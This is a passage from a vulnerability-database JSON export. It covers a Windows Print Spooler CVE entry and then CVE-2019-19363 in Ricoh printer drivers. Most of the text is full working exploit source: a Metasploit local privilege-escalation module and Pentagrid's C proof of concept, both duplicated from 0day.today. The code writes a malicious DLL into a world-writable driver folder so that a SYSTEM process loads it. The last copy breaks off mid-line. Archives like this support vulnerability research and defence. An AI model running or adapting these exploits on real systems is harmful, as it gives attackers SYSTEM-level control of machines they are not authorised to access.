"cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*"]}, {"lastseen": "2023-05-23T15:30:33", "description": "Windows Print Spooler Elevation of Privilege Vulnerability", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-16T21:15:00", "type": "cve", "title": "CVE-2021-34481", "cwe": ["CWE-269"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34481"], "modified": "2023-04-11T18:59:00", "cpe": ["cpe:/o:microsoft:windows_10:2004", "cpe:/o:microsoft:windows_10:1809", "cpe:/o:microsoft:windows_server_2019:-", "cpe:/o:microsoft:windows_10:21h1", "cpe:/o:microsoft:windows_10:1607", "cpe:/o:microsoft:windows_server_2008:r2", "cpe:/o:microsoft:windows_rt_8.1:-", "cpe:/o:microsoft:windows_10:-", "cpe:/o:microsoft:windows_10:20h2", "cpe:/o:microsoft:windows_server_2008:-", "cpe:/o:microsoft:windows_server_2012:-", "cpe:/o:microsoft:windows_7:-", "cpe:/o:microsoft:windows_10:1909", "cpe:/o:microsoft:windows_8.1:-", "cpe:/o:microsoft:windows_server_2016:2004", "cpe:/o:microsoft:windows_server_2016:-"], "id": "CVE-2021-34481", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-34481", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:21h1:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:-:sp2:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_rt_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:*:*"]}], "metasploit": [{"lastseen": "2023-02-20T05:00:33", "description": "Various Ricoh printer drivers allow escalation of privileges on Windows systems. For vulnerable drivers, a low-privileged user can read/write files within the `RICOH_DRV` directory and its subdirectories. `PrintIsolationHost.exe`, a Windows process running as NT AUTHORITY\\SYSTEM, loads driver-specific DLLs during the installation of a printer. A user can elevate to SYSTEM by writing a malicious DLL to the vulnerable driver directory and adding a new printer with a vulnerable driver. This module leverages the `prnmngr.vbs` script to add and delete printers. Multiple runs of this module may be required given successful exploitation is time-sensitive.\n", "cvss3": {}, "published": "2020-01-24T22:14:51", "type": "metasploit", "title": "Ricoh Driver Privilege Escalation", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2019-19363"], "modified": "2021-09-08T21:59:25", "id": "MSF:EXPLOIT-WINDOWS-LOCAL-RICOH_DRIVER_PRIVESC-", "href": "https://www.rapid7.com/db/modules/exploit/windows/local/ricoh_driver_privesc/", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Local\n Rank = NormalRanking\n\n include Msf::Post::File\n include Msf::Exploit::EXE\n include Msf::Post::Windows::Priv\n include Msf::Exploit::FileDropper\n prepend Msf::Exploit::Remote::AutoCheck\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'Ricoh Driver Privilege Escalation',\n 'Description' => %q{\n Various Ricoh printer drivers allow escalation of\n privileges on Windows systems.\n\n For vulnerable drivers, a low-privileged user can\n read/write files within the `RICOH_DRV` directory\n and its subdirectories.\n\n `PrintIsolationHost.exe`, a Windows process running\n as NT AUTHORITY\\SYSTEM, loads driver-specific DLLs\n during the installation of a printer. A user can\n elevate to SYSTEM by writing a malicious DLL to\n the vulnerable driver directory and adding a new\n printer with a vulnerable driver.\n\n This module leverages the `prnmngr.vbs` script\n to add and delete printers. Multiple runs of this\n module may be required given successful exploitation\n is time-sensitive.\n },\n 'License' => MSF_LICENSE,\n 'Author' => [\n 'Alexander Pudwill', # discovery & PoC\n 'Pentagrid AG', # PoC\n 'Shelby Pace' # msf module\n ],\n 'References' => [\n [ 'CVE', '2019-19363'],\n [ 'URL', 'https://www.pentagrid.ch/en/blog/local-privilege-escalation-in-ricoh-printer-drivers-for-windows-cve-2019-19363/']\n ],\n 'Arch' => [ ARCH_X86, ARCH_X64 ],\n 'Platform' => 'win',\n 'Payload' => {\n },\n 'SessionTypes' => [ 'meterpreter' ],\n 'Targets' => [\n [\n 'Windows', { 'Arch' => [ ARCH_X86, ARCH_X64 ] }\n ]\n ],\n 'Notes' => {\n 'SideEffects' => [ ARTIFACTS_ON_DISK ],\n 'Reliability' => [ UNRELIABLE_SESSION ],\n 'Stability' => [ SERVICE_RESOURCE_LOSS ]\n },\n 'DisclosureDate' => '2020-01-22',\n 'DefaultTarget' => 0,\n 'Compat' => {\n 'Meterpreter' => {\n 'Commands' => %w[\n stdapi_sys_process_execute\n ]\n }\n }\n )\n )\n\n self.needs_cleanup = true\n end\n\n def check\n @driver_path = ''\n dir_name = \"C:\\\\ProgramData\\\\RICOH_DRV\"\n\n return CheckCode::Safe('No Ricoh driver directory found') unless directory?(dir_name)\n\n driver_names = dir(dir_name)\n\n return CheckCode::Detected(\"Detected Ricoh driver directory, but no installed drivers\") unless driver_names.length\n\n vulnerable = false\n driver_names.each do |driver_name|\n full_path = \"#{dir_name}\\\\#{driver_name}\\\\_common\\\\dlz\"\n next unless directory?(full_path)\n\n @driver_path = full_path\n\n res = cmd_exec(\"icacls \\\"#{@driver_path}\\\"\")\n next unless res.include?('Everyone:')\n next unless res.match(/\\(F\\)/)\n\n vulnerable = true\n break\n end\n\n return CheckCode::Detected('Ricoh driver directory does not have full permissions') unless vulnerable\n\n vprint_status(\"Vulnerable driver directory: #{@driver_path}\")\n CheckCode::Appears('Ricoh driver directory has full permissions')\n end\n\n def add_printer(driver_name)\n fail_with(Failure::NotFound, 'Printer driver script not found') unless file?(@script_path)\n\n dll_data = generate_payload_dll\n dll_path = \"#{@driver_path}\\\\headerfooter.dll\"\n\n temp_path = expand_path('%TEMP%\\\\headerfooter.dll')\n vprint_status(\"Writing dll to #{temp_path}\")\n\n bat_file_path = expand_path(\"%TEMP%\\\\#{Rex::Text.rand_text_alpha(5..9)}.bat\")\n cp_cmd = \"copy /y \\\"#{temp_path}\\\" \\\"#{dll_path}\\\"\"\n bat_file = <<~HEREDOC\n :repeat\n #{cp_cmd} && goto :repeat\n HEREDOC\n\n write_file(bat_file_path, bat_file)\n write_file(temp_path, dll_data)\n register_files_for_cleanup(bat_file_path, temp_path)\n\n script_cmd = \"cscript \\\"#{@script_path}\\\" -a -p \\\"#{@printer_name}\\\" -m \\\"#{driver_name}\\\" -r \\\"lpt1:\\\"\"\n bat_cmd = \"cmd.exe /c \\\"#{bat_file_path}\\\"\"\n print_status(\"Adding printer #{@printer_name}...\")\n client.sys.process.execute(script_cmd, nil, { 'Hidden' => true })\n vprint_status(\"Executing script...\")\n cmd_exec(bat_cmd)\n rescue Rex::Post::Meterpreter::RequestError => e\n e_log(\"#{e.class} #{e.message}\\n#{e.backtrace * \"\\n\"}\")\n end\n\n def exploit\n fail_with(Failure::None, 'Already running as SYSTEM') if is_system?\n\n fail_with(Failure::None, 'Must have a Meterpreter session to run this module') unless session.type == 'meterpreter'\n\n if sysinfo['Architecture'] != payload.arch.first\n fail_with(Failure::BadConfig, 'The payload should use the same architecture as the target driver')\n end\n\n @printer_name = Rex::Text.rand_text_alpha(5..9)\n @script_path = \"C:\\\\Windows\\\\System32\\\\Printing_Admin_Scripts\\\\en-US\\\\prnmngr.vbs\"\n drvr_name = @driver_path.split('\\\\')\n drvr_name_idx = drvr_name.index('RICOH_DRV') + 1\n drvr_name = drvr_name[drvr_name_idx]\n\n add_printer(drvr_name)\n end\n\n def cleanup\n print_status(\"Deleting printer #{@printer_name}\")\n Rex.sleep(3)\n delete_cmd = \"cscript \\\"#{@script_path}\\\" -d -p \\\"#{@printer_name}\\\"\"\n client.sys.process.execute(delete_cmd, nil, { 'Hidden' => true })\n end\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/local/ricoh_driver_privesc.rb", "cvss": {"score": 0.0, "vector": "NONE"}}], "exploitpack": [{"lastseen": "2020-04-01T20:40:37", "description": "\nRicoh Printer Drivers - Local Privilege Escalation", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-01-22T00:00:00", "type": "exploitpack", "title": "Ricoh Printer Drivers - Local Privilege Escalation", "bulletinFamily": "exploit", "hackapp": {}, "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-19363"], "modified": "2020-01-22T00:00:00", "id": "EXPLOITPACK:CCA4761A63552664BBDE027DD8AD1FAE", "href": "", "sourceData": "/*\n\nThis proof of concept code monitors file changes on Ricoh's driver DLL files and overwrites\na DLL file before the library is loaded (CVE-2019-19363).\n\nWritten by Pentagrid AG, 2019.\n\nCf. https://pentagrid.ch/en/blog/local-privilege-escalation-in-ricoh-printer-drivers-for-windows-cve-2019-19363/\n\nCredits: Alexander Pudwill\n\nThis proof of concept code is based on the ReadDirectoryChangesW API call to\nget notified about changes on files and directories and reuses parts from the example from\nhttps://www.experts-exchange.com/questions/22507220/ReadDirectoryChangesW-FWATCH-MSDN-sample-not-working.html\n\n*/\n#include <stdio.h>\n#include <stdlib.h>\n#include <conio.h>\n#include <windows.h>\n\n#define MAX_BUFFER 4096\n\nint change_counter = 0;\nconst WCHAR * const BaseDirName = L\"C:\\\\ProgramData\";\nconst WCHAR * TargetDllFullFilePath, * TargetDLLRelFilePath, * MaliciousLibraryFile, * PrinterName;\nDWORD dwNotifyFilter = FILE_NOTIFY_CHANGE_LAST_WRITE |\n FILE_NOTIFY_CHANGE_SIZE |\n FILE_NOTIFY_CHANGE_LAST_ACCESS |\n FILE_NOTIFY_CHANGE_CREATION;\n\ntypedef struct _DIRECTORY_INFO {\n HANDLE hDir;\n TCHAR lpszDirName[MAX_PATH];\n CHAR lpBuffer[MAX_BUFFER];\n DWORD dwBufLength;\n OVERLAPPED Overlapped;\n} DIRECTORY_INFO, *PDIRECTORY_INFO, *LPDIRECTORY_INFO;\n\nDIRECTORY_INFO DirInfo;\n\nvoid WINAPI HandleDirectoryChange(DWORD dwCompletionPort) {\n DWORD numBytes, cbOffset;\n LPDIRECTORY_INFO di;\n LPOVERLAPPED lpOverlapped;\n PFILE_NOTIFY_INFORMATION fni;\n WCHAR FileName[MAX_PATH];\n\n do {\n\n GetQueuedCompletionStatus((HANDLE)dwCompletionPort, &numBytes, (LPDWORD)&di, &lpOverlapped, INFINITE);\n\n if (di) {\n fni = (PFILE_NOTIFY_INFORMATION)di->lpBuffer;\n\n do {\n cbOffset = fni->NextEntryOffset;\n\n // get filename\n size_t num_elem = fni->FileNameLength / sizeof(WCHAR);\n if (num_elem >= sizeof(FileName) / sizeof(WCHAR)) num_elem = 0;\n\n wcsncpy_s(FileName, sizeof(FileName)/sizeof(WCHAR), fni->FileName, num_elem);\n FileName[num_elem] = '\\0';\n wprintf(L\"+ Event for %s [%d]\\n\", FileName, change_counter);\n\n if (fni->Action == FILE_ACTION_MODIFIED) {\n\n if (!wcscmp(FileName, TargetDLLRelFilePath)) {\n\n if (change_counter > 0)\n change_counter--;\n if (change_counter == 0) {\n change_counter--;\n\n if (CopyFile(MaliciousLibraryFile, TargetDllFullFilePath, FALSE))\n wprintf(L\"+ File %s copied to %s.\\n\", MaliciousLibraryFile, TargetDllFullFilePath);\n\n else {\n wchar_t buf[256];\n\n FormatMessageW(FORMAT_MESSAGE_FROM_SYSTEM | FORMAT_MESSAGE_IGNORE_INSERTS,\n NULL, GetLastError(), MAKELANGID(LANG_NEUTRAL, SUBLANG_DEFAULT),\n buf, (sizeof(buf) / sizeof(wchar_t)), NULL);\n\n wprintf(L\"+ Failed to copy file %s to %s: %s\\n\", MaliciousLibraryFile, TargetDllFullFilePath, buf);\n }\n\n exit(1);\n } // end of trigger part\n }\n } // eo action mod\n fni = (PFILE_NOTIFY_INFORMATION)((LPBYTE)fni + cbOffset);\n\n } while (cbOffset);\n\n // Reissue the watch command\n ReadDirectoryChangesW(di->hDir, di->lpBuffer, MAX_BUFFER, TRUE, dwNotifyFilter, &di->dwBufLength, &di->Overlapped, NULL);\n }\n } while (di);\n}\n\nvoid WINAPI InstallPrinter() {\n WCHAR cmd_buf[1000];\n swprintf(cmd_buf, sizeof(cmd_buf), L\"/c rundll32 printui.dll, PrintUIEntry /if /b \\\"Printer\\\" /r lpt1: /m \\\"%s\\\"\", PrinterName);\n wprintf(L\"+ Adding printer: %s\\n\", cmd_buf);\n\n unsigned long ret = (unsigned long) ShellExecuteW(0, L\"open\", L\"cmd\", cmd_buf, NULL, SW_HIDE);\n if(ret <= 32) // That seems to be the way to handle ShellExecuteW's ret value.\n wprintf(L\"+ Failed launching command. Return value is %d\\n\", ret);\n}\n\nvoid WINAPI WatchDirectories(HANDLE hCompPort) {\n DWORD tid;\n HANDLE hThread;\n\n ReadDirectoryChangesW(DirInfo.hDir, DirInfo.lpBuffer, MAX_BUFFER, TRUE, dwNotifyFilter, &DirInfo.dwBufLength, &DirInfo.Overlapped, NULL);\n\n // Create a thread to sit on the directory changes\n hThread = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)HandleDirectoryChange, hCompPort, 0, &tid);\n\n // Just loop and wait for the user to quit\n InstallPrinter();\n while (_getch() != 'q');\n\n // The user has quit - clean up\n PostQueuedCompletionStatus(hCompPort, 0, 0, NULL);\n\n // Wait for the Directory thread to finish before exiting\n WaitForSingleObject(hThread, INFINITE);\n CloseHandle(hThread);\n}\n\n\nint wmain(int argc, WCHAR *argv[]) {\n HANDLE hCompPort = NULL; // Handle To a Completion Port\n\n if (argc == 6) {\n PrinterName = argv[1];\n TargetDllFullFilePath = argv[2];\n TargetDLLRelFilePath = argv[3];\n MaliciousLibraryFile = argv[4];\n change_counter = _wtoi(argv[5]);\n }\n else {\n wprintf(L\"+ Usage: %s <printer_name> <fullpath_monitor_dll> <rel_path_monitor_dll> <new_dll> <counter>\\n\", argv[0]);\n return 0;\n }\n wprintf(L\"+ Monitoring directory %s\\n\", BaseDirName);\n\n // Get a handle to the directory\n DirInfo.hDir = CreateFile(BaseDirName,\n FILE_LIST_DIRECTORY,\n FILE_SHARE_READ | FILE_SHARE_WRITE | FILE_SHARE_DELETE,\n NULL,\n OPEN_EXISTING,\n FILE_FLAG_BACKUP_SEMANTICS | FILE_FLAG_OVERLAPPED,\n NULL);\n\n if (DirInfo.hDir == INVALID_HANDLE_VALUE) {\n wprintf(L\"Unable to open directory %s. GLE=%ld. Terminating...\\n\",\n BaseDirName, GetLastError());\n return 0;\n }\n\n lstrcpy(DirInfo.lpszDirName, BaseDirName);\n\n if (HANDLE hFile = CreateFile(TargetDllFullFilePath,\n GENERIC_WRITE,\n FILE_SHARE_READ | FILE_SHARE_WRITE | FILE_SHARE_DELETE,\n NULL,\n CREATE_ALWAYS,\n FILE_ATTRIBUTE_NORMAL,\n NULL)) {\n wprintf(L\"+ File %s created\\n\", TargetDllFullFilePath);\n CloseHandle(hFile);\n }\n else\n wprintf(L\"+ File %s could not be created\\n\", TargetDllFullFilePath);\n\n\n if ((hCompPort = CreateIoCompletionPort(DirInfo.hDir, hCompPort, (ULONG_PTR)&DirInfo, 0)) == NULL) {\n wprintf(L\"+ CreateIoCompletionPort() failed.\\n\");\n return 0;\n }\n\n wprintf(L\"+ Press <q> to exit\\n\");\n\n // Start watching\n WatchDirectories(hCompPort);\n\n CloseHandle(DirInfo.hDir);\n CloseHandle(hCompPort);\n return 1;\n}", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}], "zdt": [{"lastseen": "2021-12-20T05:56:35", "description": "", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-02-10T00:00:00", "type": "zdt", "title": "Ricoh Driver - Privilege Escalation Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-19363"], "modified": "2020-02-10T00:00:00", "id": "1337DAY-ID-33926", "href": "https://0day.today/exploit/description/33926", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'msf/core/exploit/exe'\n\nclass MetasploitModule < Msf::Exploit::Local\n Rank = NormalRanking\n\n include Msf::Post::File\n include Msf::Exploit::EXE\n include Msf::Post::Windows::Priv\n include Msf::Exploit::FileDropper\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Ricoh Driver Privilege Escalation',\n 'Description' => %q(\n Various Ricoh printer drivers allow escalation of\n privileges on Windows systems.\n\n For vulnerable drivers, a low-privileged user can\n read/write files within the `RICOH_DRV` directory\n and its subdirectories.\n\n `PrintIsolationHost.exe`, a Windows process running\n as NT AUTHORITY\\SYSTEM, loads driver-specific DLLs\n during the installation of a printer. A user can\n elevate to SYSTEM by writing a malicious DLL to\n the vulnerable driver directory and adding a new\n printer with a vulnerable driver.\n\n This module leverages the `prnmngr.vbs` script\n to add and delete printers. Multiple runs of this\n module may be required given successful exploitation\n is time-sensitive.\n ),\n 'License' => MSF_LICENSE,\n 'Author' => [\n 'Alexander Pudwill', # discovery & PoC\n 'Pentagrid AG', # PoC\n 'Shelby Pace' # msf module\n ],\n 'References' =>\n [\n [ 'CVE', '2019-19363'],\n [ 'URL', 'https://www.pentagrid.ch/en/blog/local-privilege-escalation-in-ricoh-printer-drivers-for-windows-cve-2019-19363/']\n ],\n 'Arch' => [ ARCH_X86, ARCH_X64 ],\n 'Platform' => 'win',\n 'Payload' =>\n {\n },\n 'SessionTypes' => [ 'meterpreter' ],\n 'Targets' =>\n [[\n 'Windows', { 'Arch' => [ ARCH_X86, ARCH_X64 ] }\n ]],\n 'Notes' =>\n {\n 'SideEffects' => [ ARTIFACTS_ON_DISK ],\n 'Reliability' => [ UNRELIABLE_SESSION ],\n 'Stability' => [ SERVICE_RESOURCE_LOSS ]\n },\n 'DisclosureDate' => \"Jan 22 2020\",\n 'DefaultTarget' => 0\n ))\n\n self.needs_cleanup = true\n\n register_advanced_options([\n OptBool.new('ForceExploit', [ false, 'Override check result', false ])\n ])\n end\n\n def check\n dir_name = \"C:\\\\ProgramData\\\\RICOH_DRV\"\n\n return CheckCode::Safe('No Ricoh driver directory found') unless directory?(dir_name)\n driver_names = dir(dir_name)\n\n return CheckCode::Detected(\"Detected Ricoh driver directory, but no installed drivers\") unless driver_names.length\n\n vulnerable = false\n driver_names.each do |driver_name|\n full_path = \"#{dir_name}\\\\#{driver_name}\\\\_common\\\\dlz\"\n next unless directory?(full_path)\n @driver_path = full_path\n\n res = cmd_exec(\"icacls \\\"#{@driver_path}\\\"\")\n next unless res.include?('Everyone:')\n next unless res.match(/\\(F\\)/)\n\n vulnerable = true\n break\n end\n\n return CheckCode::Detected('Ricoh driver directory does not have full permissions') unless vulnerable\n\n vprint_status(\"Vulnerable driver directory: #{@driver_path}\")\n CheckCode::Appears('Ricoh driver directory has full permissions')\n end\n\n def add_printer(driver_name)\n fail_with(Failure::NotFound, 'Printer driver script not found') unless file?(@script_path)\n\n dll_data = generate_payload_dll\n dll_path = \"#{@driver_path}\\\\headerfooter.dll\"\n\n temp_path = expand_path('%TEMP%\\\\headerfooter.dll')\n vprint_status(\"Writing dll to #{temp_path}\")\n\n bat_file_path = expand_path(\"%TEMP%\\\\#{Rex::Text.rand_text_alpha(5..9)}.bat\")\n cp_cmd = \"copy /y \\\"#{temp_path}\\\" \\\"#{dll_path}\\\"\"\n bat_file = <<~HEREDOC\n :repeat\n #{cp_cmd} && goto :repeat\n HEREDOC\n\n write_file(bat_file_path, bat_file)\n write_file(temp_path, dll_data)\n register_files_for_cleanup(bat_file_path, temp_path)\n\n script_cmd = \"cscript \\\"#{@script_path}\\\" -a -p \\\"#{@printer_name}\\\" -m \\\"#{driver_name}\\\" -r \\\"lpt1:\\\"\"\n bat_cmd = \"cmd.exe /c \\\"#{bat_file_path}\\\"\"\n print_status(\"Adding printer #{@printer_name}...\")\n client.sys.process.execute(script_cmd, nil, { 'Hidden' => true })\n vprint_status(\"Executing script...\")\n cmd_exec(bat_cmd)\n rescue Rex::Post::Meterpreter::RequestError => e\n e_log(\"#{e.class} #{e.message}\\n#{e.backtrace * \"\\n\"}\")\n end\n\n def exploit\n fail_with(Failure::None, 'Already running as SYSTEM') if is_system?\n\n fail_with(Failure::None, 'Must have a Meterpreter session to run this module') unless session.type == 'meterpreter'\n\n if sysinfo['Architecture'] != payload.arch.first\n fail_with(Failure::BadConfig, 'The payload should use the same architecture as the target driver')\n end\n\n @driver_path = ''\n unless check == CheckCode::Appears || datastore['ForceExploit']\n fail_with(Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override')\n end\n\n @printer_name = Rex::Text.rand_text_alpha(5..9)\n @script_path = \"C:\\\\Windows\\\\System32\\\\Printing_Admin_Scripts\\\\en-US\\\\prnmngr.vbs\"\n drvr_name = @driver_path.split('\\\\')\n drvr_name_idx = drvr_name.index('RICOH_DRV') + 1\n drvr_name = drvr_name[drvr_name_idx]\n\n add_printer(drvr_name)\n end\n\n def cleanup\n print_status(\"Deleting printer #{@printer_name}\")\n Rex.sleep(3)\n delete_cmd = \"cscript \\\"#{@script_path}\\\" -d -p \\\"#{@printer_name}\\\"\"\n client.sys.process.execute(delete_cmd, nil, { 'Hidden' => true })\n end\nend\n", "sourceHref": "https://0day.today/exploit/33926", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-12-18T09:45:41", "description": "", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-01-22T00:00:00", "type": "zdt", "title": "Ricoh Printer Drivers - Local Privilege Escalation Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-19363"], "modified": "2020-01-22T00:00:00", "id": "1337DAY-ID-33859", "href": "https://0day.today/exploit/description/33859", "sourceData": "/*\n\nThis proof of concept code monitors file changes on Ricoh's driver DLL files and overwrites\na DLL file before the library is loaded (CVE-2019-19363).\n\nWritten by Pentagrid AG, 2019.\n\nCf. https://pentagrid.ch/en/blog/local-privilege-escalation-in-ricoh-printer-drivers-for-windows-cve-2019-19363/\n\nCredits: Alexander Pudwill\n\nThis proof of concept code is based on the ReadDirectoryChangesW API call to\nget notified about changes on files and directories and reuses parts from the example from\nhttps://www.experts-exchange.com/questions/22507220/ReadDirectoryChangesW-FWATCH-MSDN-sample-not-working.html\n\n*/\n#include <stdio.h>\n#include <stdlib.h>\n#include <conio.h>\n#include <windows.h>\n\n#define MAX_BUFFER 4096\n\nint change_counter = 0;\nconst WCHAR * const BaseDirName = L\"C:\\\\ProgramData\";\nconst WCHAR * TargetDllFullFilePath, * TargetDLLRelFilePath, * MaliciousLibraryFile, * PrinterName;\nDWORD dwNotifyFilter = FILE_NOTIFY_CHANGE_LAST_WRITE |\n FILE_NOTIFY_CHANGE_SIZE |\n FILE_NOTIFY_CHANGE_LAST_ACCESS |\n FILE_NOTIFY_CHANGE_CREATION;\n\ntypedef struct _DIRECTORY_INFO {\n HANDLE hDir;\n TCHAR lpszDirName[MAX_PATH];\n CHAR lpBuffer[MAX_BUFFER];\n DWORD dwBufLength;\n OVERLAPPED Overlapped;\n} DIRECTORY_INFO, *PDIRECTORY_INFO, *LPDIRECTORY_INFO;\n\nDIRECTORY_INFO DirInfo;\n\nvoid WINAPI HandleDirectoryChange(DWORD dwCompletionPort) {\n DWORD numBytes, cbOffset;\n LPDIRECTORY_INFO di;\n LPOVERLAPPED lpOverlapped;\n PFILE_NOTIFY_INFORMATION fni;\n WCHAR FileName[MAX_PATH];\n\n do {\n\n GetQueuedCompletionStatus((HANDLE)dwCompletionPort, &numBytes, (LPDWORD)&di, &lpOverlapped, INFINITE);\n\n if (di) {\n fni = (PFILE_NOTIFY_INFORMATION)di->lpBuffer;\n\n do {\n cbOffset = fni->NextEntryOffset;\n\n // get filename\n size_t num_elem = fni->FileNameLength / sizeof(WCHAR);\n if (num_elem >= sizeof(FileName) / sizeof(WCHAR)) num_elem = 0;\n\n wcsncpy_s(FileName, sizeof(FileName)/sizeof(WCHAR), fni->FileName, num_elem);\n FileName[num_elem] = '\\0';\n wprintf(L\"+ Event for %s [%d]\\n\", FileName, change_counter);\n\n if (fni->Action == FILE_ACTION_MODIFIED) {\n\n if (!wcscmp(FileName, TargetDLLRelFilePath)) {\n\n if (change_counter > 0)\n change_counter--;\n if (change_counter == 0) {\n change_counter--;\n\n if (CopyFile(MaliciousLibraryFile, TargetDllFullFilePath, FALSE))\n wprintf(L\"+ File %s copied to %s.\\n\", MaliciousLibraryFile, TargetDllFullFilePath);\n\n else {\n wchar_t buf[256];\n\n FormatMessageW(FORMAT_MESSAGE_FROM_SYSTEM | FORMAT_MESSAGE_IGNORE_INSERTS,\n NULL, GetLastError(), MAKELANGID(LANG_NEUTRAL, SUBLANG_DEFAULT),\n buf, (sizeof(buf) / sizeof(wchar_t)), NULL);\n\n wprintf(L\"+ Failed to copy file %s to %s: %s\\n\", MaliciousLibraryFile, TargetDllFullFilePath, buf);\n }\n\n exit(1);\n } // end of trigger part\n }\n } // eo action mod\n fni = (PFILE_NOTIFY_INFORMATION)((LPBYTE)fni + 